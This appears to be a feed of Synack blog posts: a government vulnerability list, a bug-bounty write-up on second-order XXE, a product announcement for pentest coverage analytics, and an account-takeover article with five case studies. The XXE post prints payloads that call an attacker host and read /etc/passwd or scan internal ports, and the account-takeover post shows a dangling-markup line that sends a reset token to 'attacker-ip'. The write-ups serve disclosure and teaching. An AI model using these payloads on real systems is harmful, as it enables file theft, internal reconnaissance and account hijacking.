The second most common vulnerability found in 2022 relates to improper authorizations. With authorizations, a user’s right to “access a given resource [is] based on the user’s privileges and any permissions or other access-control specifications that apply to the resource.” In this case, unauthorized users may gain access to resources or initiate unwanted actions that they should not be allowed to perform, potentially leading to data exposures, DoS, or arbitrary code execution.

#1: Cross Site Scripting XSS 

The most found vulnerability among Synack’s government missions in 2022 was cross-site scripting (XSS). According to NIST, this vulnerability “allows attackers to inject malicious code into an otherwise benign website. These scripts acquire the permissions of scripts generated by the target website and can therefore compromise the confidentiality and integrity of data transfers between website and client. Websites are vulnerable if they display user-supplied data from requests or forms without sanitizing the data so that it is not executable.”

Government organizations need to stay on top of these and countless other vulnerabilities, and mandates are pushing security teams to address this head on by adopting a zero trust model. At a high level, a Zero Trust Architecture provides a framework and structural guidance to ensure that only the individuals and systems who need access, have access. Dedicated and continuous application security testing programs are a critical piece to achieving a zero trust paradigm, and investment in security testing is critical to ensuring agencies in the United States have minimized known vulnerabilities and are adhering to Executive Order 14028 and Memorandum 22-09.

How can my team reduce found vulnerabilities?

  • Understand your attack surface. Ensure you have a clear picture of your dynamic assets and that your attack surface is defined. This is key to managing cyber risk. 
  • Set your vulnerability alerts. Stay aware of the latest active exploits, vulnerabilities and security issues affecting government and industry-specific verticals by signing up for alerts from CISA.
  • TEST! Does your security testing plan include testing for the 5 common vulnerabilities above? Synack can help. Chat with a Synack public sector representative today to learn how the Synack platform empowers in-house teams to scale and protect your mission continuously in a FedRAMP Moderate In Process environment.
  • Double down on Vulnerability Management. Make sure you are prioritizing vulnerabilities according to their criticality, patching them and then independently verifying that those patches have worked.
  • Orchestrate. Your SOAR has defensive security data from logging, alerting, threat intel and more. You should also integrate Synack continuous penetration testing data to automate your offensive security practices within the SOC. Such an integration will enable continuous, defensive improvements so you can truly grade and improve your security posture.

Additional Resources

READ: Our Guide to Zero Trust
WATCH: Webinar with HHS’ Matthew Shallbetter
LEARN: Synack’s FedRAMP Moderate In Process Certification

The post The Top 5 Cybersecurity Vulnerabilities for Government Agencies in 2022 appeared first on Synack.

Exploits Explained: Second Order XXE Exploitation

6 January 2023 at 10:39

Kuldeep Pandya is a member of the Synack Red Team. You can find him on Twitter or his blog.

This writeup is about my recent discovery of a Second Order XXE that allowed me to read files stored on the web server.

One morning, a fresh target was onboarded and I hopped onto it as soon as I received the email. In the scope, there were two web applications listed along with two postman collections. I prefer postman collections over web apps, so I loaded the collections with their environments into my postman.

After sending the very first request, I noticed that the application was using SOAP API to transfer the data. I tried to perform XXE in the SOAP body but the application threw an error saying “DOCTYPE is not allowed”.

Here, we cannot perform XXE as DOCTYPE is explicitly blocked.

Upon checking all the modules one by one, I came across a module named NormalTextRepository in the postman collection which had the following two requests:

  • saveNormalText
  • GetNamedNormalText

After sending the first saveNormalText request and intercepting it in Burp Suite, I found out that it contained some HTML-encoded data that looked like this:

Upon decoding, the data looked like this:

<?xml version="1.0"?>
<normal xmlns="urn:hl7-org:v3" xmlns:XX="http://REDACTED.com/REDACTED"><content XX:statu

This quickly caught my attention. This was XML data being passed inside the XML body in a SOAP request (Inception vibes).

I went on to try XXE here as well. For this, I copy pasted a simple Blind XXE payload from PortSwigger:

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com/XXETEST"> %xxe; ]>

I used Synack’s provided web server to test for this. Upon checking its logs, I found there indeed was a hit for the /XXETEST endpoint.

This still was a blind XXE and I had to turn it into a full XXE in order to receive a full payout. I tried different file read payloads from PayloadsAllTheThings and HackTricks but they did not seem to work in my case.

For me, the XXE was not reflected anywhere in the response. This is why it was comparatively difficult to exploit.

After poking for a while, I gave up with the idea of full XXE and went ahead to check if an internal port scan was possible or not as I was able to send HTTP requests.

I sent the request to Burp Suite’s intruder and fuzzed for the ports from 1 to 1000. The payload for that looked like the following:

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:§1§/XXETEST"> %xxe; ]>

However, the result of the intruder didn’t make any sense to me. All the ports that I fuzzed were throwing random time delays.

I lost all hope and was about to give up on this XXE once again. Then a thought struck, “If this data is being saved in the application, it has to be retrievable in some way as well.” I checked the other GetNamedNormalText request in this module and instantly felt silly. This request retrieved the data that we saved from the first saveNormalText request.

I used the following XXE file read payload and saved the data:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>

Then sent the second GetNamedNormalText request to retrieve the saved data. And in the response, I could see the contents of the /etc/passwd file!

This was enough for a proof of concept. However, looking at the JSESSIONCOOKIE, I could tell that the application was built using Java. And, in Java applications, if you just provide a directory instead of a file, it will list down the contents of that directory and return it.

To confirm this theory, I just removed the /passwd portion from the above file read payload. The updated payload looked like this:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY example SYSTEM "/etc"> ]>

Upon saving the above payload and retrieving it using the second request, we could see the directory listing of the /etc directory!

I sent it to Synack and they happily triaged it within approximately 2 hours.

The post Exploits Explained: Second Order XXE Exploitation appeared first on Synack.

Worry-free Pentesting: Continuous Oversight In Offensive Security Testing

6 December 2022 at 06:00

In your cybersecurity practice, do you ever worry that you’ve left your back door open and an intruder might sneak inside? If you answered yes, you’re not alone. The experience can be a common one, especially for security leaders of large organizations with multiple layers of tech and cross-team collaboration to accomplish live, continuous security workflows.

At Synack, the better way to pentest is one that’s always on, can scale to test for urgent vulnerabilities or compliance needs, and provides transparent, thorough reporting and coverage insight.

Know what’s being tested, where it’s happening and how often it’s occurring 

With Synack365, our Premier Security Testing Platform, you can find relief in the fact that we’re always checking for unlocked doors. To provide better testing oversight, we maintain reports that list all web assets being tested, which our customers have praised. Customer feedback indicated that adding continuous oversight into host assets would also help to know which host or web assets are being tested, when and where they’re being tested, and how much testing has occurred. 

Synack’s expanded Coverage Analytics tells you all that and more for host assets, in addition to our previous coverage details on web applications and API endpoints, all found within the Synack platform. With Coverage Analytics, Synack customers are able to identify which web or host assets have been tested and the nature of the testing performed. This is helpful for auditing purposes and provides proof of testing activity, not just that an asset is in scope. Additionally, Coverage Analytics gives customers an understanding of areas that haven’t been tested as heavily for vulnerabilities and can provide internal red team leaders with direction for supplemental testing and prioritization. 

Unmatched Oversight of Coverage 

Other forms of security testing are unable to provide the details and information Synack Coverage Analytics does. Bug bounty testing typically goes through the untraceable public internet or via tagged headers, which require security researcher cooperation. The number of researchers and hours that they are testing are not easily trackable via these methods, if at all. Traditional penetration testing doesn’t have direct measurement capabilities. Our LaunchPoint infrastructure stands between the Synack Red Team, our community of 1,500 security researchers, and customer assets, so customers have better visibility of the measurable traffic during a test. More and more frequently, we hear that customers are required to provide this kind of information to their auditors in financial services and other industries. 

A look at the Classified Traffic & Vulnerabilities view in Synack’s Coverage Analytics. Sample data has been used for illustration purposes.

Benefits of Coverage Analytics 

  • Know what’s being tested within your web and host assets: where, when and how much 
  • View the traffic generated by the Synack Red Team during pentesting
  • Take next steps with confidence; identify where you may need supplemental testing and how to prioritize such testing

Starting today, security leaders can reduce their teams’ fears of pentesting in the dark by knowing what’s being tested, where and how much at any time across both web and host assets. Coverage Analytics makes sharing findings with executive leaders, board members or auditors simple and painless.

Current Synack customers can log in to the Synack Platform to explore Coverage Analytics today. If you have questions or are interested in learning more about Coverage Analytics, part of Synack’s Better Way to Pentest, don’t hesitate to contact us today!

The post Worry-free Pentesting: Continuous Oversight In Offensive Security Testing appeared first on Synack.

Account Takeovers:  Believe the Unbelievable

18 November 2022 at 12:39

Nikhil Srivastava is a Synack Red Team legend and co-founder of Bsides Ahmedabad.

An Account Takeover (ATO) is an attack whereby attackers take ownership of online accounts using several methods. It is unfortunately more common than you’d think, despite all the warnings to create complex passwords, avoid phishing emails and use multi-factor authentication.

Recent research shows 1 in 5 adults have suffered from an account takeover with  average financial losses of approximately $12,000. Further, PerimeterX reported that 75 to 85% of all attempted logins in the second half of 2020 were account takeover attempts. 

The Digital Shadows Research Team exposed an even more concerning statistic: more than 24 billion account usernames and passwords are available for purchase on the dark web. In some cases, purchasing credentials isn’t necessary, as year after year, the most common password is 123456, appearing in one out of every 200 passwords. 

Now that we know just how common ATOs are, let’s review some of the tactics, techniques and procedures (TTPs) used in such attacks.

Account Takeover Methodologies

  • Change Email/Password CSRFThe simplest ATO employs phishing. An attacker sends a link to the victim, and when the unsuspecting user clicks on the link, the victim’s email/password will be changed and the attacker can take over their account.
  • OAuth CSRFConsider a website that allows users to log in using either a classic, password-based mechanism or by linking their account to a social media profile using OAuth. In this case, if the application fails to use the state parameter, an attacker could potentially hijack a user’s account on the client application by binding it to their own social media account.
  • Default/Weak Credentials – Most products have their own default credentials for things like servers, routers, and Virtual Network Computing (VNC) that sometimes do not get changed. Many applications lack a strong password policy and will allow users to set weak passwords such as 123456.
  • Forgot your password? – Sometimes “forget password” implementations can be vulnerable to password reset token leaks, HTTP leaks, bypassing poor security questions, Host header injection or HTTP Parameter Pollution attacks. 
  • Credential Stuffing – In this method, attackers use lists of compromised user credentials to breach a system. Bots can be deployed for automation and scale, based on the assumption that many users reuse usernames and passwords across multiple services.

Examples of Account Takeovers

Here are five anonymized ATO case studies from a variety of industries, including healthcare, software, government and commerce. 

Case Study 1 

In the case of an American chain restaurant, I used trufflehog, a Python search tool, to review the target. While scanning the application, it produced an alert of hard-coded, JavaScript credentials. Browsing the JavaScript, I found some UPS credentials had been hard coded, as shown in the screenshot below.

Using these credentials, I was able to login into their UPS account as an admin which granted me access to sensitive information and control over their shipments.

Case Study 2

Another ATO was for a collaboration software application. While resetting the password for an admin account, I found that the application leaked their password reset token in response, as shown in the screenshot below.

Using this token, I was able to reset the admin password. Sometimes, it really is that simple. 

Case Study 3

This is a case study of a product from a medical equipment company. I tested the whole application without getting any vulnerabilities and at the end decided to check the forget password flow. While requesting the password reset token, the application sent the following request that revealed a path for me to exploit.

I used a Dangling Markup such as <img src=”http://attacker-ip/?id= in the email body before the reset link and sent it to the user. Now as soon as the user opens the email, their password reset token will be sent to me instead.

Case Study 4

The scope of this target was a wildcard and unauthenticated testing only, so I first did some reconnaissance. I found an interesting subdomain that asked for a DVN ID and password to login.

I searched about DVN IDs in help articles, and I found out it’s a 9-digit number assigned to all vendors at the time of licensing.

I did Google searches but didn’t come up with this particular ID. I ended up looking at Google images results in hope that licensing could have been done with paper and could have this ID number included.

Cool, I was correct! Licensing was done on paper and I got a couple of valid DVN IDs in the subject of letters, such as: 

Now that I had this ID, I tried brute-forcing to get a password. When that turned up nothing, I retested the “forget password” flow. It asked for the DVN ID first before resetting the password. I found that the application used two requests for resetting the password. One for querying the password for DVN ID and another one sending a newly generated password to their email ID inside the request itself.

So, this disclosed not only their password but emails too. Using the newly generated password, I was able to login into their account.

Case Study 5 

I was scanning targets for an American food and beverage company when I came across an event application. The application asked for a valid user email to login, and those company emails were whitelisted. I tried with my name@companydomain at first to see the error message and I found the following.

I noticed an email for support was given at the bottom of the page to reach out for any trouble. I thought: Why not attempt it? I entered some information and found the following screen:

The application asked to set the password, and after setting up a password, I was able to login as admin:

Further, while checking the attendee directory, I found multiple accounts that could’ve been taken over using the same method.

Conclusion 

It’s hard to believe that someone with little to no technical experience could gain the level of access that I did, but you should! Account takeovers can be complex, but they can also be relatively simple. All it takes is a bit of creativity and motivation, and just about anyone can login as an admin.

The post Account Takeovers:  Believe the Unbelievable appeared first on Synack.

❌
❌